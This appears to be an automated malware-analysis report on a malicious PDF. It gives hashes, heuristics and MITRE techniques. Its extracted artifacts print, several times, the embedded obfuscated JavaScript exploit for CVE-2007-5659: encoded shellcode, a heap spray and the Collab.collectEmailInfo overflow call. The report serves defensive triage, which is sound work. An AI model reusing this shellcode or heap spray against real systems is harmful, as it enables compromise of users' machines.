Malicious PDF — malware analysis report

Static analysis result for SHA-256 a1c8482e422bf9d6…

MALICIOUS

PDF

1.17 MB Created: 2009-12-17 03:14:38 +08:00 Authoring application: PScript5.dll Version 5.2 (via Acrobat Distiller 7.0.5 (Windows)) First seen: 2026-05-11
MD5: dfc52c2e3d26a1a751cb4771d5b3073f SHA-1: 1a3d781f37033abd254483de67a9d432844df9e4 SHA-256: a1c8482e422bf9d638d380814d278cee24772aa23bf44b1b895233cddccccb28
160 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The PDF file was flagged by an ML classifier as malicious with a high probability. It contains embedded JavaScript, which is a common technique for delivering malicious payloads. The embedded JavaScript file 'javascript_obj0031_000.js' is likely responsible for the malicious behavior, potentially downloading and executing further stages.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9990

Heuristics 8

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
  • Generic recovered JavaScript exploit stage high PDF_GENERIC_STAGE_RECOVERY
    Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • Object number defined twice with different bodies info PDF_DUPLICATE_OBJ_BODY_INCREMENTAL
    The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In PDF document text
    • http://ns.adobe.com/pdf/1.3/In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
k1 pdf-embedded-file PDF EmbeddedFile object 26 at offset 0x1EC1 2041 bytes
SHA-256: d126f2ad4fc1902116e64aff7689cafa64a8efc447f950c255d916aa5935137f
javascript_obj0031_000.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B202 1661 bytes
SHA-256: ff49f8bd3e9d5aabdb4f8a0e53247b64c43edb796d234ec15c3a2220057d8d7c
Preview script
First 1,000 lines of the extracted script
<</Filter[/FlateDecode]/Length 1605>>stream
H��WYO#G ~_i��e		�ݨ�虞e�� � ̂��I�0}�c|���!� OUό
( 6�j_ZMMW�W_}�m�p���Z�h�?) ��j!�;u��C  .����FU��jwyRꌦ���y}u7>� ����ol��Ƨ 	�[{G� � B�� � �[	�8{+�=wo�  ,.a -D�  ?��V��	 B��" � �* @Т �� �O�$
@| ���0�C X\�ﭴ�@&%|��򈀯�`<u�]  �4 � �0
 �� - �,憀#�: � xʑ �
 ��� ���q45���Bd�  D�]��Y � )� # I�
\}�Pmf���� 5�6Y!��aV" �.G�(���8 �'`X (V颫e  � 
\ �O�#�'B���!�x*���� @k<� ���OM��e� ��"H �A �B _fܦN��P|($� ;6 P!dU���^��x��<�f��� # :L�����" ���k���C'  `8X �����+�3Y� �C��PF
>r�AX��"� |l. W �0ur5�H-�2�\c&  Z�  t行�� �~�:�BAD �TC�{ 2�0 �&�V([��Zw  �-���[� �g'Γ���H�~W&�5m�H��p�}�ѭ�g$�Xv�  (�,� Ah���b[u W�cCaf�=�C ��Px�  {��)�S  h��P��~ ���N� ⳲF�D���H H�%�Y��dl�; Ʋy� �7e3e��:��5Ӗ c�
 u�V� ����� ��3.Xr��&��+�؅G��T� �(�4�q\w� �-����*� /�d a���B��� j.�dD��Z ׭.<�Q�Ax  ɶ
< L� ��-H� ��U ��a���C`�A`� �81� a�� ��=	�g �27��̪M i����*�@eN ���ñtw��� �8L��   j�R��D��Sz�ʭ ��d��5 $�) �X��2j�V �o T�Vf��>���A��a�;��a�g�������r �k�p!�M�̧�f�v7�Λg�F�T�D��U�ܫ\ Y6;� �_�������q �
�~�� � ��  SB�N5���h~�e�~|9���iq҇�=��� #�y��� ���YN�v���S>��]���N��̭�u Gl ��V��� �v�z; ��;�!�Ǖv�
 6�n�՜�V�U�R :��\����M ������f������JOĜ��Ws �Ͽ}k�Nz7� ���^�x3 � �.�F � #���� �Ï ��h�r��ך��� 
9Ƚ �p��w� �8 
[Q�tU?�-�qqX��xں��uU���<��]Uo�9�O�ݓw�h1�o��u �^����zQ^DQ�? j�`k���<� �ɧ��� �.]5�j�R�| �����@�q1��j�*=vk'��; y�D>��r����Qt���3f�k�l\�^ r�k�;N �u��� �[���utҪ6 ݇9^7S�� ���a� {/ o��� uQ}���z|�[G�����m�=�L:��7���r !�ǭs9��� �ʦ8��U ��ՠ��59��Fe�*m��	� ?"�W˥?&r�p�{��o?"� �� �z��&�O~�(��g�}-;�� .Dm� �
fBn���g� ��	��� � " ��8 ���p��wH� F�_�l< y{9�+@Y6  � ��I ��S=�� .�ї\>�i� |y#�_ �  0 ��Ga
endstre
javascript_obj0031_001.js pdf-javascript-stream PDF /JS object 31 at offset 0x12B238 4442 bytes
SHA-256: 4fec83008fdca629a2fe82732f49aa16a3aa8aa30151da1912f45ac55c3be145
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("\x25\x759090\x25\x759090\x25\x759090\x25\x753de9\x25\x750001%u5600%uc033%u8b64%u3040%u408b%u8b0c"+
"%u1c70%u8bad%u0840%uc35e%u50ad%ue852\x25\x75000d\x25\x750000"+
"%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3%u6c8b"+
"%u2424%u458b%u8b3c%u2854%u0378%u8bd5%u184a%u5a8b"+
"%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0"+
"%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824"+
"%ue175%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03"+
"%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000"+
"%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75"+
"%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c"+
"%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045"+
"%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b"+
"%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855"+
"%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca"+
"%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79"+
"%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e\x25\x750397"+
"%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000"+
"%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000"+
"%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865"+
"%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000\x25\x75b2e8"+
"%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8"+
"%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51"+
"%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba"+
"%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845"+
"%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103"+
"%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a"+
"%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45"+
"%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00"+
"%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55\x25\x756800"+
"%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40"+
"%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb"+
"%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45"+
"%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51"+
"%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b"+
"%u66ff%ue828\x25\x75fff1%uffff%u6a5d\x25\x756a00%uffff%u0455"+
"%u0000");
var o ="";
for (QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR=128;QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR>=0;--QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR) o += UHNijmYGB("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = UHNijmYGB("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl;
ckfgWiGNFKsVyrV = new Array();
for (zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm=0;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm<1450;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm++) ckfgWiGNFKsVyrV[zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = UHNijmYGB("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x4000) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
generic_stage_recovery_000.js deobfuscated-js generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x12B202 5852 bytes
SHA-256: da873ec89fb5803f447e90c85c0fff7f1b669cc47b27d4b89f1338998551a9a6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
<</Filter[/FlateDecode]/Length 1605>>stream
H��WYO#G ~_i��e		�ݨ�虞e�� � ̂��I�0}�c|���!� OUό
( 6�j_ZMMW�W_}�m�p���Z�h�?) ��j!�;u��C  .����FU��jwyRꌦ���y}u7>� ����ol��Ƨ 	�[{G� � B�� � �[	�8{+�=wo�  ,.a -D�  ?��V��	 B��" � �* @Т �� �O�$
@| ���0�C X\�ﭴ�@&%|��򈀯�`<u�]  �4 � �0
 �� - �,憀#�: � xʑ �
 ��� ���q45���Bd�  D�]��Y � )� # I�
\}�Pmf���� 5�6Y!��aV" �.G�(���8 �'`X (V颫e  � 
\ �O�#�'B���!�x*���� @k<� ���OM��e� ��"H �A �B _fܦN��P|($� ;6 P!dU���^��x��<�f��� # :L�����" ���k���C'  `8X �����+�3Y� �C��PF
>r�AX��"� |l. W �0ur5�H-�2�\c&  Z�  t行�� �~�:�BAD �TC�{ 2�0 �&�V([��Zw  �-���[� �g'Γ���H�~W&�5m�H��p�}�ѭ�g$�Xv�  (�,� Ah���b[u W�cCaf�=�C ��Px�  {��)�S  h��P��~ ���N� ⳲF�D���H H�%�Y��dl�; Ʋy� �7e3e��:��5Ӗ c�
 u�V� ����� ��3.Xr��&��+�؅G��T� �(�4�q\w� �-����*� /�d a���B��� j.�dD��Z ׭.<�Q�Ax  ɶ
< L� ��-H� ��U ��a���C`�A`� �81� a�� ��=	�g �27��̪M i����*�@eN ���ñtw��� �8L��   j�R��D��Sz�ʭ ��d��5 $�) �X��2j�V �o T�Vf��>���A��a�;��a�g�������r �k�p!�M�̧�f�v7�Λg�F�T�D��U�ܫ\ Y6;� �_�������q �
�~�� � ��  SB�N5���h~�e�~|9���iq҇�=��� #�y��� ���YN�v���S>��]���N��̭�u Gl ��V��� �v�z; ��;�!�Ǖv�
 6�n�՜�V�U�R :��\����M ������f������JOĜ��Ws �Ͽ}k�Nz7� ���^�x3 � �.�F � #���� �Ï ��h�r��ך��� 
9Ƚ �p��w� �8 
[Q�tU?�-�qqX��xں��uU���<��]Uo�9�O�ݓw�h1�o��u �^����zQ^DQ�? j�`k���<� �ɧ��� �.]5�j�R�| �����@�q1��j�*=vk'��; y�D>��r����Qt���3f�k�l\�^ r�k�;N �u��� �[���utҪ6 ݇9^7S�� ���a� {/ o��� uQ}���z|�[G�����m�=�L:��7���r !�ǭs9��� �ʦ8��U ��ՠ��59��Fe�*m��	� ?"�W˥?&r�p�{��o?"� �� �z��&�O~�(��g�}-;�� .Dm� �
fBn���g� ��	��� � " ��8 ���p��wH� F�_�l< y{9�+@Y6  � ��I ��S=�� .�ї\>�i� |y#�_ �  0 ��Ga
endstre  
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u9090%u9090%u9090%u3de9%u0001%u5600%uc033%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0840%uc35e%u50ad%ue852%u000d%u0000%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3%u6c8b%u2424%u458b%u8b3c%u2854%u0378%u8bd5%u184a%u5a8b%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824%ue175%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e%u0397%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000%ub2e8%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55%u6800%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b%u66ff%ue828%ufff1%uffff%u6a5d%u6a00%uffff%u0455%u0000");
var o ="";
for (QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR=128;QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR>=0;--QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR) o += UHNijmYGB("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = UHNijmYGB("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl;
ckfgWiGNFKsVyrV = new Array();
for (zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm=0;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm<1450;zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm++) ckfgWiGNFKsVyrV[zkVoGQeQFyIBlflMXwiwgEyqkDSmUmULzZgBlRriKYKENOdrqXXsHDxAhvIFbHDxUTgCsdHdoDujCfuBxSnm] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = UHNijmYGB("%u0c0c%u0c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x4000) iJCYnMqYfdUqJybccHmtjpgocdxIgC+=iJCYnMqYfdUqJybccHmtjpgocdxIgC;
this.collabStore = Collab.collectEmailInfo({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
generic_stage_recovery_001.js deobfuscated-js generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B238 4190 bytes
SHA-256: 737504a94cc5811e98f64e98a008d8f4b849c051fba25a59ece43d7190a51dfa
Detection
ClamAV: No threats found
Obfuscation or payload: likely
11 of 18 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
var UHNijmYGB=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = UHNijmYGB("%u9090%u9090%u9090%u3de9%u0001%u5600%uc033%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0840%uc35e%u50ad%ue852%u000d%u0000%u0789%uc483%u8308%u04c7%uf13b%uec75%u60c3%u6c8b%u2424%u458b%u8b3c%u2854%u0378%u8bd5%u184a%u5a8b%u0320%ue3dd%u4934%u348b%u038b%u33f5%u33ff%ufcc0%u84ac%u74c0%uc107%u0dcf%uf803%uf4eb%u7c3b%u2824%ue175%u5a8b%u0324%u66dd%u0c8b%u8b4b%u1c5a%udd03%u048b%u038b%u89c5%u2444%u611c%uc7c3%u6445%u0000%u0000%u006a%u458d%u505c%u0068%u0004%uff00%u3c75%u75ff%uff48%u1855%uc933%u8b66%u5c4d%u7d8b%u8b3c%ub3f7%uacd8%uc332%ufeaa%ue2cb%u6af8%u8d00%u6045%uff50%u5c75%u558b%u523c%u75ff%uff4c%u1c55%u558b%u2960%u5855%u7d83%u0058%ub87f%u75ff%uff4c%u0855%u8ec3%u0e4e%u83ec%ub5b9%ufb78%ufd97%u330f%u8aca%u4f5b%uc703%ua5bf%u0017%u167c%ufa65%u1f10%u0a79%uace8%uda08%uad76%u7d9b%u98df%u8afe%uec0e%u0397%u000c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ubb00%ubbbb%u00bb%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u7400%u6d65%u2e70%u7865%u0065%u00e8%u0000%u5d00%ued81%u0076%u0000%ub2e8%ufffe%u8bff%u8bd0%u8bf5%u8bfe%u83ce%u30c1%ub5e8%ufffe%u33ff%u89c9%u484d%u4583%u0448%uc933%uff51%u4875%u55ff%u3d24%ub600%u0012%uec72%u003d%u12ba%u7700%u68e5%u00ff%u0000%u406a%u55ff%u892c%u3845%u6850%u00ff%u0000%u55ff%u8b0c%u8bc8%u3845%uc103%ue883%uc605%u0000%u75ff%uff38%u1055%u006a%u006a%u0068%u001f%uff00%u4875%u55ff%u6a20%u8d00%u5c45%u6a50%u8d04%u5445%uff50%u4875%u55ff%u6a18%u6a00%u6800%u1f10%u0000%u75ff%uff48%u2055%u6a55%u6800%u0080%u0000%u026a%u006a%u016a%u0068%u0000%u8d40%u6845%u8350%u1445%ueb05%u8b0a%u8bf5%u55ff%uec8b"+
"%u66ff%ue814%ufff1%uffff%u835d%ufff8%u0275%u39eb%u4589%u684c%u0400%u0000%u406a%u55ff%u892c%u3c45%u458b%u8954%u5845%u50e8%ufffe%u55ff%uc933%u8d51%u6845%u8350%u2845%ueb05%u8b0a%u90f5%u5590%uec8b%u66ff%ue828%ufff1%uffff%u6a5d%u6a00%uffff%u0455%u0000");
var o ="";
for (QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR=128;QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR>=0;--QWERtgvYHBasdfZXCbnmKJHpoiOKMIJNBHUijnTFCXDR) o += UHNijmYGB("%u4943%u9f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = UHNijmYGB("%u4943%u9f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.substring(0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQiiKYl;
ckfgWiGNFKsVyrV = new Array();
